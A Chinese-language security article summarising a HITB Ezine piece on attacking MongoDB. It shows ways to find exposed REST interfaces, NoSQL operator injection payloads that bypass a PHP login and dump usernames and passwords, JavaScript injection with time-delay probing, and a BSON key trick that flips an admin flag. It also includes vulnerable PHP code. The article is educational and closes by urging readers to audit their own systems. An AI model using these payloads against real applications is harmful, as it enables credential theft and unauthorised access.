Attacking MongoDB

0x00 背景

---

本文主要來自於HITB Ezine Issue 010中的《Attacking MongoDB》

MongoDB是一個基於分散式檔案儲存的資料庫。由C++語言編寫。旨在為WEB應用提供可擴充套件的高效能資料儲存解決方案。是一個介於關聯式資料庫和非關聯式資料庫之間的產品，是非關聯式資料庫當中功能最豐富，最像關聯式資料庫的。他支援的資料結構非常鬆散，是類似json的bson格式，因此可以儲存比較複雜的資料型別。Mongo最大的特點是他支援的查詢語言非常強大，其語法有點類似於物件導向的查詢語言，幾乎可以實現類似關聯式資料庫單表查詢的絕大部分功能，而且還支援對資料建立索引。

開發人員使用NoSQL資料庫的各種應用越來越多。 針對NoSQL的攻擊方法是知之甚少，並不太常見。與SQL隱碼攻擊比較，本文重點介紹透過MongoDB的漏洞對Web應用程式可能的攻擊。

0x01 攻擊

---

1)REST介面

關注到有一個REST介面，提供一個web介面訪問，預設執行在28017埠上，管理員可以用瀏覽器遠端控制資料庫，這個介面我發現了兩個儲存型xss以及很多的CSRF。

尋找方式：

http://www.shodanhq.com/search?q=port%3A28017

google搜尋：

intitle:mongo intext:"listDatabases"

下了最新版本的mongodb預設不是啟用rest的，需要在配置檔案（/etc/mongod.conf）中加入一行

rest = true

才可以開啟其他連結內容。

下圖展示了攻擊方法

插入js程式碼，讓管理員執行，利用REST介面，執行mongodb的命令，結果返回到攻擊者的伺服器上。

例如，我利用js程式碼讓管理員訪問http://xxx.com:28017/admin/$cmd/?filter_eval=function()%7B%20return%20db.version()%20%7D&limit=1

返回結果：

2)Apache+PHP+MongoDB

一段php操作MongoDB的程式碼：

#!php
$q = array("name" => $_GET['login'], "password" => $_ GET['password']);
$cursor = $collection->findOne($q);

這個指令碼的是向MongoDB資料庫請求，如果正常的話，會返回使用者的資料：

#!php
echo 'Name: ' . $cursor['name'];
echo 'Password: ' . $cursor['password']; 

訪問下面的連線

?login=admin&password=pa77w0rd 

資料庫裡的執行情況是：

db.items.findOne({"name" :"admin", "password" : "pa77w0rd"}) 

如果資料庫裡存在的該使用者名稱及密碼則返回true，否則返回fales。

下面的資料庫語句，返回的為使用者不是admin的資料（$ne代表不等於）：

db.items.find({"name" :{$ne : "admin"}}) 

那麼在現實中的資料庫操作例子通常是這樣子的：

db.items.findOne({"name" :"admin", "password" : {$ne : "1"}}) 

返回結果將是：

{
    "_id" : ObjectId("4fda5559e5afdc4e22000000"),
    "name" : "admin",
    "password" : "pa77w0rd"
}

php傳入的方式為：

#!php
$q = array("name" => "admin", "password" => array("\$ne" => "1"));

外界請求的引數應該為：

?login=admin&password[$ne]=1   

當使用正則$regex的時候，執行下列資料庫語句，將會返回name中所有已y開頭的資料

db.items.find({name: {$regex: "^y"}})  

如果請求資料的指令碼換為：

#!php
$cursor1 = $collection->find(array("login" => $user, "pass" => $pass));

返回結果的資料為：

#!php
echo 'id: '. $obj2['id'] .'<br>login: '. $obj2['login'] .'<br>pass: '. $obj2['pass'] . '<br>'; 

如果想要返回所有資料的話，可以訪問下面的url：

?login[$regex]=^&password[$regex]=^ 

返回結果將會是：

id: 1
login: Admin
pass: parol
id: 4
login: user2
pass: godloveman
id: 5
login: user3
pass: thepolice=

還有一種利用$type的方式：

?login[$not][$type]=1&password[$not][$type]=1 

官方這裡有詳細介紹$type的各個值代表的意思：

http://cn.docs.mongodb.org/manual/reference/operator/query/type/

上面語句表示獲取login與password不為雙精度型別的，同樣會返回所有的資料。

3)INJECTION MongoDB

當執行的語句採用字串拼接的時候，同樣也存在注入的問題，如下程式碼：

#!php
$q = "function() { var loginn = '$login'; var passs = '$pass'; db.members.insert({id : 2, login : loginn, pass : passs}); }";

當$login與$pass是直接從外界提交到引數獲取：

$login = $_GET['login'];
$pass = $_GET['password'];

並且沒有任何過濾，直接帶入查詢：

#!php
$db->execute($q);
$cursor1 = $collection->find(array("id" => 2));
foreach($cursor1 as $obj2){
echo "Your login:".$obj2['login'];
echo "<br>Your password:".$obj2['pass'];
} 

輸入測試資料：

?login=user&password=password

返回結果將是：

Your login: user
Your password: password  

輸入

?login=user&password=';

頁面將會返回報錯。

輸入

/?login=user&password=1'; var a = '1 

頁面返回正常，如何注入出資料呢：

?login=user&password=1'; var loginn = db.version(); var b='

看一下返回結果：

帶入實際中$q是變為：

#!php
$q = "function() { var loginn = user; var passs = '1'; var loginn = db.version(); var b=''; db.members.insert({id : 2, login : loginn, pass : passs}); }"

獲取其他資料的方法：

 /?login=user&password= '; var loginn = tojson(db.members.find()[0]); var b='2

給loginn重新賦值，覆蓋原來的user內容，tojson函式幫助獲取到完整的資料資訊，否則的話將會接收到一個Array。

最重要的部分是db.memeber.find()[0]，member是一個表，find函式是獲取到所有內容，[0]表示獲取第一個陣列內，可以遞增獲取所有的內容。

當然也有可能遇到沒有返回結果的時候，經典的時間延遲注入也可以使用：

?login=user&password='; if (db.version() > "2") { sleep(10000); exit; } var loginn =1; var b='2 

4)BSON

BSON（Binary Serialized Document Format）是一種類json的一種二進位制形式的儲存格式，簡稱Binary JSON，它和JSON一樣，支援內嵌的文件物件和陣列物件，但是BSON有JSON沒有的一些資料型別，如Date和BinData型別。

預設test表中有兩條資料：

> db.test.find({}) 
{ "_id" : ObjectId("52cfa5c9e085a58263f183f9"), "name" : "admin", "isadmin" : true }
{ "_id" : ObjectId("52cfa5e4e085a58263f183fa"), "name" : "noadmin", "isadmin" : false } 

再插入一條：

> db.test.insert({ "name" : "noadmin2", "isadmin" : false}) 

然後查詢看結果：

> db.test.find({})
{ "_id" : ObjectId("52cfa5c9e085a58263f183f9"), "name" : "admin", "isadmin" : true }
{ "_id" : ObjectId("52cfa5e4e085a58263f183fa"), "name" : "noadmin", "isadmin" : false }
{ "_id" : ObjectId("52cfa92ce085a58263f183fb"), "name" : "noadmin2", "isadmin" : false } 

再插入一條列名為BSON物件的資料：

db.test.insert({ "name\x16\x00\x08isadmin\x00\x01\x00\x00\x00\x00\x00" : "noadmin2", "isadmin" : false})

isadmin之前的0x08是指該資料型別是布林型，後面的0x01是把這個值設定為1。

這時再查詢就回發現isadmin變為的true：

> db.test.find({})
{ "_id" : ObjectId("5044ebc3a91b02e9a9b065e1"), "name" : "admin", "isadmin" : true }
{ "_id" : ObjectId("5044ebc3a91b02e9a9b065e1"), "name" : "noadmin", "isadmin" : false }
{ "_id" : ObjectId("5044ebf6a91b02e9a9b065e3"), "name" : null, "isadmin" : true, "isadmin" : true } 

不過測試最新版的mongodb中，禁止了空字元。

當然了 我也覺得此類攻擊有點YY。。。

0x02 總結

---

本文列舉了四種攻擊mongodb的方式。

當然這並不是安全否認mongodb的安全性，只是構造了集中可能存在攻擊的場景。

希望大家看到後能夠自查一下，以免受到攻擊。

還有一些wofeiwo在2011年的時候就已經寫過：

Mongodb安全性初探